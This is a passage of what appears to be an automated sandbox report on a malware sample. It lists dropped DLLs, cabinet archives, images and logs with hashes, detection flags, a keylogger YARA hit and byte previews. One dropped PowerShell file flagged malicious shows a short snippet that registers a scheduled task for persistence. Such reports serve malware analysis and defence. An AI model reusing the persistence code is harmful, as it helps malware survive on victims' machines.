                                                                                                                                                                    Entropy (8bit):7.507131051649285
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24:LZwmgblk3k44Yo4bo4Y4ofXQLo4LoXgMXI7gAgXILs/fHAnzPCpdyIIMGb34oYYI:OpO0P3nfXfX/HXPX/HXai+MGb34Z
                                                                                                                                                                    MD5:402C9D31E2079948E743562CB48AF2A6
                                                                                                                                                                    SHA1:5111E39A19E0675A44369E03D4A82132F0D12977
                                                                                                                                                                    SHA-256:D82DF7AFA80AB17CF1D298488C66902F192034B6BB18176F5BD5C5B74E348E79
                                                                                                                                                                    SHA-512:27510489FAA6562507CBDB0B5F545D9124D6BA59D41A65224DD6089A9C8331279CE83905B26D41453255BDA660FBAAE957E0E17D43350DFCB86603888177C760
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.PNG........IHDR..............g-....pHYs...........~.... cHRM..z%..............u0...`..:....o._.F....PLTE.................................................................................................................................................................................;;;<<<===>>>???@@@AAABBBCCCDDDEEEFFFGGGHHHIIIJJJKKKLLLMMMNNNOOOPPPQQQRRRSSSTTTUUUVVVWWWXXXYYYZZZ[[[\\\]]]^^^___```aaabbbcccdddeeefffggghhhiiijjjkkklllmmmnnnooopppqqqrrrssstttuuuvvvwwwxxxyyyzzz{{{|||}}}~~~...................................................................................................................................................................................................................................................................................................................................................................................................B.F.....IDATx...[s.D....-.d.%...L...r*.8.....9.pC...d.g.HQf<..7.o....ju.Z.V.n9.[...u......w9wo.[./....U^....9or

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{581B7D1F-5889-4cf0-9085-A838BFAC7BF3}.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, many, 1346052 bytes, 3 files, at 0x2c +A "sites.dll" +A "themes\theme_NewInstallAir.xml", number 1, 81 datablocks, 0x1 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1346052
                                                                                                                                                                    Entropy (8bit):7.9989996832434676
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:24576:S25OCGNlwNr5PL8MqxJTFl9YioVgxuz4Z0dTeLieM1V9QPjQw:B0N2NFL8VB9iiL0dTeOt23
                                                                                                                                                                    MD5:4F688C8A30E46A14A868F07E283763F2
                                                                                                                                                                    SHA1:BA736A93EF1F07B1C7C24F4201B632F1CB18E73A
                                                                                                                                                                    SHA-256:AA02BD7AB8BBF1C1AB138C20D0D7EBB6B5F2E2166E2184405E54D619526E9AC8
                                                                                                                                                                    SHA-512:8A1F679BFA7A1D5667FAC931EF9184CBE76E30C26ED1A63E97CE4AFD8815DC1409EDB560EE91FD3DB57AA0BE10D6C567F43FE887440A09897DE09CD8DC7BA88A
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MSCF............,.......................Q....l........~Q.. .sites.dll.~m...l....cV.V .themes\theme_NewInstallAir.xml.BT..~.....cV.V .themes\NewInstallAir\NewInstallAir.ui..e..BJ..CK..|T..8z..IrH...L`.A..5....8Q..e.0.......4.T1.....'..v..-...V?.Wm...Uk..g2..Bx)...j.L..0..9w.}......w..w..{....k....k....y.nb...p..4.ie..r...?..0....9a.V.x.....p,.}..........<.h...C...#...q.-(u....]7qb....|..n.y.?.{j.-.9.t.e._F.....s..;.o...+..e.............._.........Gn..[sn6.e.g...V#..j.'.a..8&.y~I,.S.4+...LJf.'O..[.F....).w....ubOf.T...}S!;...D......."......J1.Ma..5...l.T......<....E.._.U..al.....w.......<..H...r......v.............1..o.uz1.......... ./...vE..N..mf...8.Bx..-{.....y.....)....o......z./.....mr.S,-#...9.....]..U....,r.w$`.lH^.R...po...o....8(..6...]..L$. [.~.%...J.V.....).v.s....5..vHu.t....c..z->..y.b..../%..yN+..O.>.ST.."!. dE.T..X..Y.w?........n.Y.-.....:..ZH.}.+..l..-..10..J.bk......~..O.<.k!{.6!Rx..2.8i@[.....S/C....=..:.z..............@....>.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{82B94658-F26C-4724-9A4F-C20F7A91E3A3}.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Microsoft Cabinet archive data, Windows 2000/XP setup, 304652 bytes, 1 file, at 0x2c +A "360P2SP.dll", ID 808, number 1, 22 datablocks, 0x1503 compression
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):304652
                                                                                                                                                                    Entropy (8bit):7.999195439763513
                                                                                                                                                                    Encrypted:true
                                                                                                                                                                    SSDEEP:6144:dl5TTOp1tnABtoSIkutXiC3NxDPYhroRN6AxPM1CKSNEZ4:1TmTAB+XddZAahrKGT
                                                                                                                                                                    MD5:8039C279A02FEA0387E8D51BDDE541D5
                                                                                                                                                                    SHA1:A6A52EF6C01FDE3A1A1C702C41777119DBDB203A
                                                                                                                                                                    SHA-256:0BA9A3E6E4B89ED8C30C092845ECAB5939AFE4C701A130FDC6ECC9D0EC1A8386
                                                                                                                                                                    SHA-512:97F45BF13FF85AD252B46C8E62D2D114E84B3AEF17AA2E3B21CE47B41B416D2000506EE9BFABBC055295817CE6D7D9771A038ACFAE514CCA852EF861751C7254
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:MSCF............,...............(...H.......`..........L.z .360P2SP.dll.h..G.G..[...3.@..."R`4..m....mnu..e.r.\.K.J.....u.Pw..9f..u..H..?7.=z."|..^ ...].fi.r...........biw.Se6".p......;N....o.rI.x...$.IN.><...o......[6.k.[.lRvl..zK.{v.kKh6!36kOi..6.3Z.`.6+.B..c.t2.B)Zq.3$..V.@w......... T..4DWF.`.W..~.<.....73o7&7.L..5....rF....E.....~.@.@{...B~~.ho.D..X..pH+.. ..}-BMrx.".dU....e".nk.D...................L..e...L..~3E.......H.r..6m.G.o..z...g......}....zT.[-.K.{.\......W?..}.^....<.z.W.y.i.z&....@.-..AJN9.[.J.]Z.....k...+.2....M.........H.H...E"....`.....p.,>Q.....D.....>.B.*{..t;bw..hb.....dW8.....eH2.l....^...KyD.Z.`I.........^W..k.$..;n.I..&.>s.8..WF...}......W)...:.-Sp<m..:\..U..]JT....Kw.(.......x.:.-..C..e..a..... {...!Y./1.MnF..05...9......}...+WR8W.z...fe...+..s5.....E.6w.rzP.&..Ii...h.....L$....Z~.}N...W9.6pMt4.f..R...RL.........CH:.Q.-a1... ........Y.......P..B.:M.........l.w..Xn.....VN...7Fk*G...3...H....i.C..`q4.Q.&.9.X...^.p/.K.(....

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{92EE34F9-CBF9-4899-A446-C0FD9C9E29A7}.tmp\360P2SP.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):704608
                                                                                                                                                                    Entropy (8bit):6.625840358726942
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:1IhyxJ3BYXF6WxYC2aeHACRYlH+ZOAyTjUnIgidGtAd8Rwb33+YnBsLS683wK9T7:ih8WxYCyYlaOYnliItjRwbH+YBsLS68N
                                                                                                                                                                    MD5:D875875EB3282B692AB10E946EA22361
                                                                                                                                                                    SHA1:34BCEF8A8CB0E1DB44671892AC3CBD74D3C541A8
                                                                                                                                                                    SHA-256:0ECA2E140F973B2011C633D4D92E512A1F77E1DA610CFE0F4538C0B451270016
                                                                                                                                                                    SHA-512:972466310D3C145141320584B5F3E431C6888BDA2BA1036F85E68E534ED6FB97BA04CBD46D8D9C401DC5857100DC1BFF1BAD82B50514F3E5C582522F22FD2B5C
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 4%
                                                                                                                                                                    Joe Sandbox View:
                                                                                                                                                                    • Filename: QQyisSetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: wyySetups64.exe, Detection: malicious, Browse
                                                                                                                                                                    • Filename: A1FsbRkm5m.exe, Detection: malicious, Browse
                                                                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......*...nl..nl..nl..I..ol...s..fl..p>'.kl...#5.kl..g.6.Ol..g.*.el..I..ql..nl...m..g. ..l..g.'..l..g.1.ol..p>7.ol..nl4.ll..g.2.ol..Richnl..................PE..L......Z...........!......................................................................@..............................................................5......LS...................................................................................text............................... ..`.rdata..w...........................@..@.data...`........4..................@....rsrc...............................@..@.reloc..`p.......r..................@..B................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\sites.dll

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1469440
                                                                                                                                                                    Entropy (8bit):6.242110984104102
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:24576:l4LEubC/9euoUCi82BbjSyM5hGfzmzJHXW+U0:UEubUo1i3eymhGfizJHK0
                                                                                                                                                                    MD5:A2FF2C72E739E0CF4C73B623444CA39D
                                                                                                                                                                    SHA1:FF886E63C894A20F30C136A8264CFA33D41B8331
                                                                                                                                                                    SHA-256:C1EB83993C85E01EE6AE84EB6E05744FF8C3CCC02C41D09C22286E3012EF46FC
                                                                                                                                                                    SHA-512:844DAB35A1625D5BF1BD814A36FB80D5670D3DFEE5CF65AD8BE53784B486DCC08898B7577A323C7C7E1E83655F861EA86C5453CFA4C3D55353D329EF3AF6320B
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$.......~].:<..:<..:<...s7.<<..3D4..<..3D(.7<......2<..$n%.?<..:<...>......%<......;<..3D"..<..3D%..<..3D3.;<..$n5.;<..:<6.;<..3D0.;<..Rich:<..........................PE..L...0..\...........!.....@...$.......E.......P............................................@.................................<].......`..H-...........4..h7...........X..............................8...@............P..,............................text...f?.......@.................. ..`.rdata...=...P...>...D..............@..@.data...............................@....rsrc...H-...`......................@..@.reloc...............>..............@..B........................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\NewInstallAir\NewInstallAir.ui

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:Zip archive data, at least v2.0 to extract, compression method=store
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):1135682
                                                                                                                                                                    Entropy (8bit):7.510976265913228
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:12288:Q0+G8ZYG6xrKI/ZFfg5Vfg5nfg53x3mYiJ6YJ6MJ6MEJl:QvGJxuI/bfQVfQnfQ3x3TUbhMl
                                                                                                                                                                    MD5:44C8DF596B52856EB1D3FE2E37CBDE4D
                                                                                                                                                                    SHA1:4AADBEEF9DC6CD4CCAC758EBDB852915C09545DF
                                                                                                                                                                    SHA-256:ECDDA2FB9EB27F1B56349E2ABFE90CE2F8741B982A3DD6D248E7D93E6B75DE2C
                                                                                                                                                                    SHA-512:EA94ED1662EFD2F6D91B4D05059DFADD8F290EEDBB45433E33F3B4E3729822A40E0C63D319F2041F3F1738650219200D594CED9E36B558AFF0A494FAB53A0E47
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:PK...........Q................DPI_240_Images/PK........0PZU....%...%.......DPI_240_Images/bg_promote.png.PNG........IHDR.............\$......PLTE............U.wh......^.tz..........Ita0bL.?#.?$.A$.G'.P-.S..U0.W0.X1.Y2.Z2.[3.\3.^4._6.a6.d7.g9.j;.m<.o>.q@.tA.vB.yC.|E..G..I..J..K..L..M..N..O..Q..Q..S.pI.tK.xL.uJ.wJ.yK.zL.|M.}N..O..M..O.}L.{J.zJ.tH.vI.yJ.|L.}MD.@..=..?..A..E.G.A.H.-.dG.{[..9.n'.^8.f).Z"{R..O..Q..R..T..W..Y..\".^#.a&.d(.g*.k..o...............3&.5'.6(.9*.=).9(.9%.<&.=".9..5..1..-..&.....R3.W5.R3.Z6.\9._;.a=.c>.e?.f@.hA.jB.lC.nE.pE.rF.tG.uG.wH(.;<..._C.dD.iF.lJ.qL.uN.xO.|Q..R..T..V..X..U..R..P..L..K..V..X..Z..[..].._..a.h@.d;.k?.pB.uEq.........>jW(U?.F/.R>.VA.ZB.\E.`F.dG.fI.iJ.egF..%.........}.*...b...........<.~;.|9.z7.x5.w3.u1.r...U.....k.!mI+sQ...8}\...G.i......q.]R..E.&<.,4.1,.5%.9..D..J..L..L..Y.|........X.E...T.j.....a.2.^..F..1..............`..A..,..W....y0&$.....IDATx......A..P:@.A......K...$.qwx.T...[...>`...D.oW.'u...?..qy...t...,S.Y..<. M

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{A44B7723-4283-41b8-B9C0-6B1983C61382}.tmp\themes\theme_NewInstallAir.xml

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):28030
                                                                                                                                                                    Entropy (8bit):3.581114835224513
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:96:E4EuXYuiODQGYuBRrNRrQRrmRrXejXvXH5CeGTNxyqIYuyLmacwrvlCX4uH3OYqm:6nOT+bO7lU51EHWkGHr
                                                                                                                                                                    MD5:8074E9740A0E3CFDA172AD1983C72A05
                                                                                                                                                                    SHA1:B6D006ADAFF1FD059268517B6BD5610EF15D3BA9
                                                                                                                                                                    SHA-256:E4ED337A562AAC81005D451CFD4AEF721CF067ECBC6D1057601AEFC41EE83E26
                                                                                                                                                                    SHA-512:F6680CF19B512060B6ED1C0F88C8EE31A1BE456A37204CB63073E0AC58A2B0F544DCC0DABF0829F28687C2842043D21D41B2F172CB15698316EBF0F2BC89C445
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".u.t.f.-.1.6.".?.>.....<.t.h.e.m.e.s.>.......<.w.i.n.d.o.w.>.........<.d.e.f.a.u.l.t. .i.c.o.n._.p.o.i.n.t.=.".4.,.4.". .s.h.o.w._.i.c.o.n.=.".0.".>...........<.c.a.n.v.a.s. .n.o.r.m.a.l.=.".0.x.f.f.2.a.b.f.1.d.". .f.i.l.l.=.".0.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.s.k.i.n...p.n.g."./.>...........<.b.o.r.d.e.r. .n.o.r.m.a.l.=.".0.x.f.f.6.3.8.c.3.9.". .w.i.d.t.h.=.".1.". .i.n.n.e.r.=.".0.x.f.f.f.f.f.f.f.f."./.>...........<.f.o.n.t. .b.i.n.d._.f.o.n.t._.b.y._.l.a.n.g.u.a.g.e.=.".0.". .r.e.f.=.".". .f.a.c.e.=.".._o...,..[SO,.T.a.h.o.m.a.". .c.o.l.o.r.=.".0.x.0.0.b.5.e.5.1.3.". .s.i.z.e.=.".8.". .b.o.l.d.=.".0.". .i.t.a.l.i.c.=.".0.". .u.n.d.e.r.l.i.n.e.=.".0."./.>...........<.s.h.a.d.o.w. .b.o.r.d.e.r.=.".5.,.3.,.5.,.7.". .i.m.a.g.e.=.".../.N.e.w.I.n.s.t.a.l.l.A.i.r./.w.i.n.d.o.w._.s.h.a.d.o.w...p.n.g."./.>...........<.c.a.p.t.i.o.n. .s.h.o.w.=.".1.". .h.e.i.g.h.t.=.".3.0.". .c.o.l.o.r.=.".0.x.f.f.2.c.a.6.d.3."./.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{B7A42130-77F9-4b13-8C0B-EB34FF385D20}.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 604 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):14344
                                                                                                                                                                    Entropy (8bit):7.934027356242661
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:QTbAFSIp6FghLfaAEYlYifrkou/Z1DTn8O5zV7qh:QTkoIp68SW1Tk1Z1P8O5zch
                                                                                                                                                                    MD5:10AF715DFB97B8A187F81555C8E6068B
                                                                                                                                                                    SHA1:C108E08D53A6EC711F1BA70FDBD7561CE483CBCD
                                                                                                                                                                    SHA-256:EE7F804A1C73B6D6935FF731AE87AEFBBD1ABE16DC5FF315C5D8D91E283C902D
                                                                                                                                                                    SHA-512:FDCA596438FDD60C88DE69367ABC70D6CBFF318D8381EB4155FA257690F26D95C9A13131F676654BED27BE458A6DF67CBE1D713DE9826CF955723F6A92FC5BBB
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.PNG........IHDR...\...|.....-..)...>PLTE..q..q..s....v....x..!.1.+.+.%...|..q..r!.u$.v..t..s..t..r&.v..w+.x....z..'.x..}../.y......w..z5.{..t*.{..9.}..(.~..}#.|..".#.%.*.....~>.). ...|&.1.}....{+.!.y0.B.~F.*.=..B.6.zG.6.3.C.}:.2.~R.-.'.|B..L.K.O.=.|#.yF.".R..N.X.I.._./.xZ.,.wI..1.T.5.?...X..M..H=.w.bY.j..V*u.7....tRNS..e..e.e......2....6kIDATx...k..@..`...~.P.(j.b.%...W..EX.A.,........{.7.I3Y5......D}...i...8..`..~...W.En^8.jr..+....k... w.9.s....r....\.{-./].r.Q9...9.X.O&O..~........z]&...D.T..<|..e)/^.....X..p....|..Jd!.....7o..,...WX.....rV.../...Wo.{...K.2.U.G....4H.......y9d..q!=..i\.t5....",.r.....G.r....&.*...lI.<....z\N.<L./.k*.....B...k.U\./.t......../.7...U.+(]#.@R...V.q.g.&I.i.-d...v..-.2..a.W..LY.jl.,.B_..i..y..B....Y....K....+,]...,,..6......?..l..:#.xg.-..[o...m.WH+......E\.e|....K./...Z1]J.f.vq.Z.......u...+........[O..._..-^..E^r0.{.l.+O.FK........^...3..|]z\u.......b...VW..R.n..@...*w.q

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\{D5BF8E62-3285-45ad-A7CB-467DE934221E}.tmp

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Downloads\inst.exe
                                                                                                                                                                    File Type:PNG image data, 600 x 380, 8-bit colormap, non-interlaced
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):16151
                                                                                                                                                                    Entropy (8bit):7.9414528437087935
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:384:9SmRt7jn8csHkzjhJuCwQ19rtw5srwat0ADwP0F43ec1:dt7bjsHkBwCwseat0AkdOc1
                                                                                                                                                                    MD5:3641846128E0A27A28CA0DBA8942B896
                                                                                                                                                                    SHA1:88C40C9923AB48E0C01883A773E297541CE49882
                                                                                                                                                                    SHA-256:CBF7CD45FE193E0A438CE14B0176077762E984F897091A682F9E866983DA9174
                                                                                                                                                                    SHA-512:15910E5A279F17EA06618CB8DCBB64FE8F8E6F5061FC14BCA6A92FF2795CF64EACEB2067104358A014079550CA1B4F24200935E2F10B1EDE6622D94794047550
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.PNG........IHDR...X...|.....$m5S...GPLTE..q..q..r....v..#.....(.~+.1...w>...q..q.....r$.v".u..t..t..s..w(.w..q........}*.y..{..'.y-.y#.y1.z.....w..y6.|..{......t....x .".|'...~-.},.:.!.".%.$.(..9.}=.}%.|*./.{J.C.A.?.|+.D.0.2.2.~)...,.0.~?.?...~I.).1.x".'.|G.5.8.{N.Q.G.J.R.Q.Z.5.:.Y.Y.U..X1...M..Hc.i..\H.q..Tv.h...a....tRNS..f..f.f........hE..=pIDATx..m..`.....0..@.)q3.P.A...XDH.Q79_...B..=_;....o.i.r....q].u.....I..........w4.._..wv...E.Vs....x..v.O...>.Z......kw^...O.`..Hb........_. h.t_t:mM.b. 8@...%.)^...i.C....<...:.:a..~....... ..|....Y.l5....`&...-'..-.......&".#....ZB,..VL..../.B,.V.V.W|.Za......CZ.X\.....aT...x".w.}#.bu$.,K.....U.Y..j..U.AQ....W...{u~.....T..agf..:^f./O,.3.g..J"k^.Y....W..z'..T8<.b..ZA*.............*.....f....,*.n`Y.ld.b.K.KDV..b..S.%..F.h.O.WAEd).....#..5`^.D..Y........2&....S..S..Ax.W'....f.....+....]..}.ZQ.d..3...m.3...}.~......C..v.Y.b.........X,...l.1.)N.Y....[.....b=...=.

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~$FHfEA7As.xlsm

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:data
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):165
                                                                                                                                                                    Entropy (8bit):1.4377382811115937
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:KVC+cAmltV:KVC+cR
                                                                                                                                                                    MD5:9C7132B2A8CABF27097749F4D8447635
                                                                                                                                                                    SHA1:71D7F78718A7AFC3EAB22ED395321F6CBE2F9899
                                                                                                                                                                    SHA-256:7029AE5479F0CD98D892F570A22B2AE8302747DCFF3465B2DE64D974AE815A83
                                                                                                                                                                    SHA-512:333AC8A4987CC7DF5981AE81238A77D123996DB2C4C97053E8BD2048A64FDCF33E1245DEE6839358161F6B5EEA6BFD8D2358BC4A9188D786295C22F79E2D635E
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:.user ..j.o.n.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                                                                                                                                                                    C:\Users\user\AppData\Local\Temp\~DF163C59614BB26FC3.TMP

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                                                                    File Type:Composite Document File V2 Document, Cannot read section info
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):32768
                                                                                                                                                                    Entropy (8bit):3.746897789531007
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:192:QuY+pHkfpPr76TWiu0FPZK3rcd5kM7f+ihdCF3EiRcx+NSt0ckBCecUSaFUH:ZZpEhSTWi/ekfzaVNg0c4gU
                                                                                                                                                                    MD5:7426F318A20A187D88A6EC88BBB53BAF
                                                                                                                                                                    SHA1:4F2C80834F4B5C9FCF6F4B1D4BF82C9F7CCB92CA
                                                                                                                                                                    SHA-256:9AF85C0291203D0F536AA3F4CB7D5FBD4554B331BF4254A6ECD99FE419217830
                                                                                                                                                                    SHA-512:EC7BAA93D8E3ACC738883BAA5AEDF22137C26330179164C8FCE7D7F578C552119F58573D941B7BEFC4E6848C0ADEEF358B929A733867923EE31CD2717BE20B80
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:......................>...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Local\updated.ps1

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):151
                                                                                                                                                                    Entropy (8bit):4.741657013789009
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:3:41Ai+PBoAwnLFsI2FIERMJyjqLWAfXIhS/ytIEFMEQVGdAn:4yi+5dwnLFsI2F5KJy0fXnMFFQhn
                                                                                                                                                                    MD5:AA0E1012D3B7C24FAD1BE4806756C2CF
                                                                                                                                                                    SHA1:FE0D130AF9105D9044FF3D657D1ABEAF0B750516
                                                                                                                                                                    SHA-256:FC47E1FA89397C3139D9047DC667531A9153A339F8E29AC713E518D51A995897
                                                                                                                                                                    SHA-512:15FAE192951747A0C71059F608700F88548F3E60BB5C708B206BF793A7E3D059A278F2058D4AC86B86781B202037401A29602EE4D6C0CBAAFF532CEF311975F4
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Preview:$xmlPath = "XML??".$taskName = "????".$xmlContent = Get-Content -Path $xmlPath | Out-String.Register-ScheduledTask -Xml $xmlContent -TaskName $taskName

                                                                                                                                                                    C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5289240
                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:98304:GgF0ET9HlrxRVwJMACNiREvBvlvwvCvxvq:pZ9HhxRVwJMAqoetRqA9q
                                                                                                                                                                    MD5:B4F00FBA3327488D4CB6FD36B2D567C6
                                                                                                                                                                    SHA1:4F0548A2F6BF73A85FF17F40F420098019AC05FF
                                                                                                                                                                    SHA-256:D6A84954E038DDF4A0026705E0942FC003CFDC04E58F658A6BD9E89C37C57D18
                                                                                                                                                                    SHA-512:C573147ADFEBA7D313CC79498A1C107679F0E69805E3AA8260B3E57DBA282088BCA082536D7866D4708529BF8C3BEF56B2005BD9D59A870E3D29132F6FD3D897
                                                                                                                                                                    Malicious:true
                                                                                                                                                                    Yara Hits:
                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe, Author: Joe Security
                                                                                                                                                                    Antivirus:
                                                                                                                                                                    • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                    Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....R.d..................-...".....D.-.......-...@...........................Q......BQ..........@............................/..?....2.`.............P..)..../.............................../....................../..............................text.....-.......-................. ..`.itext..P.....-.......-............. ..`.data...x.....-.......-.............@....bss.....................................idata...?..../..@..................@....tls........../..........................rdata......../.....................@..@.reloc......../......./.............@..B.rsrc...`.....2.......1.............@..@..............Q.......P.............@..@................................................................................................

                                                                                                                                                                    C:\Users\user\AppData\Roaming\Logs\._cache_zhuzhu.log

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\AppData\Roaming\._cache_zhuzhu.exe
                                                                                                                                                                    File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):3342
                                                                                                                                                                    Entropy (8bit):5.500452462399099
                                                                                                                                                                    Encrypted:false
                                                                                                                                                                    SSDEEP:48:L4XHDzFRYSqSDzFRYNdXHDwOPxFRYeqqSDwOPxFRYpbqhSDwOPxFRYpbqhSDwOPg:LafkSDfkN13kZD3kE03kE03kE2
                                                                                                                                                                    MD5:AFCCF09B868329FC0CD689E426B77544
                                                                                                                                                                    SHA1:5517B1A57ABE2D2DE9F22390520CAE219CDD3436
                                                                                                                                                                    SHA-256:CC62FAB47CF4EA073AEE9F7588C3A69D749AF91832228940FB5563B54D7D81BF
                                                                                                                                                                    SHA-512:2EEE7F03A38592B51400E8BBFE3FB5D087F9DD3E6470D81F611213E0E672325F76C7C646BCA3BB8BE6E77BE31E4BBB212B71D15ADDE222C8D889DC36B504CB95
                                                                                                                                                                    Malicious:false
                                                                                                                                                                    Preview:----------Raised Exception--------------29/12/2024 22:59:01.298----------------..Exception PID=6340 TID=5808 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:48CB03,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)......----------Exception---------------------29/12/2024 22:59:01.298----------------..Exception Code=0x0EEDFADE Flags=0x1 Addr=0x7500CC12 PID=6340 TID=5808 [Main Thread] Build=5157....Cannot open registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\Xoreax\Incredibuild: The system cannot find the file specified....($CALLTRACE:004A1B80:7500CC12,0048CB03*2,9FE6A,F3E,664F78,D97AE,C1A6,74DEFA27,6EF7B5C,29)....----------Raised Exception--------------29/12/2024 22:59:01.298----------------..Exception PID=6340 TID=5808 [Main Thread] Build=5157....Failed to access Agent registry settings, while trying to open "SOFTWARE\Xoreax\Incredibuild" ke

                                                                                                                                                                    C:\Users\user\Desktop\._cache_zhuzhu.exe

                                                                                                                                                                    Download File
                                                                                                                                                                    Process:C:\Users\user\Desktop\zhuzhu.exe
                                                                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                    Category:dropped
                                                                                                                                                                    Size (bytes):5289240
                                                                                                                                                                    Entropy (8bit):7.236599313454909
                                                                                                                                                                    Encrypted:false
